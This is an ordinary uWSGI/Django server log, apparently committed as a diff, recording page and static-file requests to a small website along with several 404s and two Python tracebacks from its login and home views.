+[pid: 18965|app: 0|req: 116/161] 117.100.100.38 () {38 vars in 766 bytes} [Fri Jan 8 13:44:45 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 117/162] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:45 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 118/163] 117.100.100.38 () {38 vars in 766 bytes} [Fri Jan 8 13:44:45 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 119/164] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:45 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 120/165] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:45:08 2021] GET /all-3-0-0 => generated 9110 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 121/166] 117.100.100.38 () {38 vars in 1268 bytes} [Fri Jan 8 13:45:08 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/167] 117.100.100.38 () {40 vars in 1425 bytes} [Fri Jan 8 13:45:08 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 122/168] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:45:08 2021] GET /all-3-0-0 => generated 9110 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 123/169] 117.100.100.38 () {38 vars in 1268 bytes} [Fri Jan 8 13:45:08 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 124/170] 117.100.100.38 () {40 vars in 1392 bytes} [Fri Jan 8 13:45:09 2021] GET /all-0-0-0 => generated 10471 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 125/171] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:45:09 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 126/172] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:45:09 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/173] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:45:09 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 127/174] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:45:13 2021] GET /all-1-0-0 => generated 9093 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 128/175] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:45:13 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 129/176] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:45:13 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 130/177] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:45:13 2021] GET /all-2-0-0 => generated 9102 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 131/178] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:45:13 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 132/179] 117.100.100.38 () {40 vars in 1385 bytes} [Fri Jan 8 13:45:20 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 133/180] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 13:45:21 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 134/181] 117.100.100.38 () {40 vars in 1383 bytes} [Fri Jan 8 13:45:24 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 135/182] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:50:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/183] 223.104.39.100 () {40 vars in 957 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/184] 223.104.39.100 () {40 vars in 961 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/185] 223.104.39.100 () {40 vars in 979 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/186] 223.104.39.100 () {40 vars in 959 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/187] 223.104.39.100 () {40 vars in 940 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/188] 223.104.39.100 () {40 vars in 965 bytes} [Fri Jan 8 13:50:52 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/189] 223.104.39.100 () {40 vars in 938 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/190] 223.104.39.100 () {40 vars in 956 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/191] 223.104.39.100 () {40 vars in 954 bytes} [Fri Jan 8 13:50:52 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62273] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62785] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62017] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.100 client_port: 62529] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[pid: 18965|app: 0|req: 136/192] 223.104.39.100 () {40 vars in 1024 bytes} [Fri Jan 8 13:50:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/193] 223.104.39.100 () {40 vars in 957 bytes} [Fri Jan 8 13:50:54 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/194] 223.104.39.100 () {40 vars in 965 bytes} [Fri Jan 8 13:50:54 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/195] 223.104.39.100 () {40 vars in 940 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/196] 223.104.39.100 () {40 vars in 956 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/197] 223.104.39.100 () {40 vars in 954 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/198] 223.104.39.100 () {40 vars in 946 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/199] 223.104.39.100 () {40 vars in 938 bytes} [Fri Jan 8 13:50:54 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/200] 223.104.39.100 () {40 vars in 1050 bytes} [Fri Jan 8 13:50:57 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/201] 223.104.39.100 () {40 vars in 1056 bytes} [Fri Jan 8 13:50:57 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/202] 223.104.39.100 () {40 vars in 1015 bytes} [Fri Jan 8 13:50:57 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: 0|req: 137/203] 223.104.39.100 () {48 vars in 1101 bytes} [Fri Jan 8 13:51:03 2021] POST / => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 138/204] 223.104.39.100 () {48 vars in 1101 bytes} [Fri Jan 8 13:51:03 2021] POST / => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 139/205] 223.104.39.100 () {48 vars in 1101 bytes} [Fri Jan 8 13:51:06 2021] POST / => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18965|app: 0|req: 140/206] 223.104.39.100 () {40 vars in 1033 bytes} [Fri Jan 8 13:51:38 2021] GET /home/ => generated 58710 bytes in 26 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 18965|app: 0|req: 141/207] 223.104.39.100 () {40 vars in 1000 bytes} [Fri Jan 8 13:51:38 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 142/208] 101.91.62.99 () {32 vars in 634 bytes} [Fri Jan 8 13:52:37 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 143/209] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 14:10:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 144/210] 83.97.20.34 () {26 vars in 277 bytes} [Fri Jan 8 14:10:56 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 145/211] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 14:11:06 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response
+ self.check_response(response, callback)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response
+ "instead." % name
+ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead.
+[pid: 18965|app: 0|req: 146/212] 83.97.20.21 () {22 vars in 226 bytes} [Fri Jan 8 14:11:21 2021] OPTIONS / => generated 52540 bytes in 22 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 147/213] 183.136.225.35 () {30 vars in 411 bytes} [Fri Jan 8 14:52:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[uwsgi-http key: sd4404386.adsl.online.nl client_addr: 183.136.225.35 client_port: 51289] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+[pid: 18965|app: 0|req: 148/214] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:00:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 149/215] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 15:00:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 150/216] 196.52.43.108 () {26 vars in 365 bytes} [Fri Jan 8 15:29:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18965|app: 0|req: 151/217] 223.104.39.27 () {40 vars in 1033 bytes} [Fri Jan 8 15:35:42 2021] GET /home/ => generated 58710 bytes in 26 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 18965|app: 0|req: 152/218] 223.104.39.27 () {40 vars in 1000 bytes} [Fri Jan 8 15:35:43 2021] GET /favicon.ico => generated 3397 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 153/219] 223.104.39.27 () {40 vars in 1023 bytes} [Fri Jan 8 15:35:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/220] 223.104.39.27 () {40 vars in 956 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/221] 223.104.39.27 () {40 vars in 960 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/222] 223.104.39.27 () {40 vars in 958 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/223] 223.104.39.27 () {40 vars in 939 bytes} [Fri Jan 8 15:35:49 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/224] 223.104.39.27 () {40 vars in 964 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/225] 223.104.39.27 () {40 vars in 978 bytes} [Fri Jan 8 15:35:49 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/226] 223.104.39.27 () {40 vars in 937 bytes} [Fri Jan 8 15:35:50 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/227] 223.104.39.27 () {40 vars in 953 bytes} [Fri Jan 8 15:35:50 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/228] 223.104.39.27 () {40 vars in 955 bytes} [Fri Jan 8 15:35:50 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 18339] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 18851] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 18595] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 223.104.39.27 client_port: 17827] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[pid: 18965|app: 0|req: 154/229] 223.104.39.27 () {40 vars in 1023 bytes} [Fri Jan 8 15:35:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/230] 223.104.39.27 () {40 vars in 956 bytes} [Fri Jan 8 15:35:54 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/231] 223.104.39.27 () {40 vars in 978 bytes} [Fri Jan 8 15:35:54 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/232] 223.104.39.27 () {40 vars in 937 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/233] 223.104.39.27 () {40 vars in 939 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/234] 223.104.39.27 () {40 vars in 955 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/235] 223.104.39.27 () {40 vars in 953 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/236] 223.104.39.27 () {40 vars in 945 bytes} [Fri Jan 8 15:35:54 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/237] 223.104.39.27 () {40 vars in 1049 bytes} [Fri Jan 8 15:35:56 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/238] 223.104.39.27 () {40 vars in 1055 bytes} [Fri Jan 8 15:35:56 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/239] 223.104.39.27 () {40 vars in 1017 bytes} [Fri Jan 8 15:35:56 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 155/240] 117.100.100.38 () {40 vars in 1390 bytes} [Fri Jan 8 15:37:13 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 156/241] 117.100.100.38 () {48 vars in 1491 bytes} [Fri Jan 8 15:37:21 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 157/242] 117.100.100.38 () {40 vars in 1395 bytes} [Fri Jan 8 15:37:21 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 158/243] 117.100.100.38 () {40 vars in 1397 bytes} [Fri Jan 8 15:37:21 2021] GET /admin-home/ => generated 15704 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/244] 117.100.100.38 () {38 vars in 1348 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/245] 117.100.100.38 () {38 vars in 1282 bytes} [Fri Jan 8 15:37:21 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/246] 117.100.100.38 () {38 vars in 1294 bytes} [Fri Jan 8 15:37:21 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/247] 117.100.100.38 () {38 vars in 1311 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/248] 117.100.100.38 () {38 vars in 1323 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/249] 117.100.100.38 () {38 vars in 1329 bytes} [Fri Jan 8 15:37:21 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/250] 117.100.100.38 () {38 vars in 1287 bytes} [Fri Jan 8 15:37:21 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/251] 117.100.100.38 () {38 vars in 1263 bytes} [Fri Jan 8 15:37:22 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/252] 117.100.100.38 () {38 vars in 1275 bytes} [Fri Jan 8 15:37:22 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/253] 117.100.100.38 () {38 vars in 1351 bytes} [Fri Jan 8 15:37:23 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 159/254] 117.100.100.38 () {38 vars in 1352 bytes} [Fri Jan 8 15:37:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 160/255] 117.100.100.38 () {38 vars in 1364 bytes} [Fri Jan 8 15:37:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 161/256] 117.100.100.38 () {38 vars in 1356 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 162/257] 117.100.100.38 () {38 vars in 1320 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 163/258] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 164/259] 117.100.100.38 () {38 vars in 1340 bytes} [Fri Jan 8 15:37:24 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
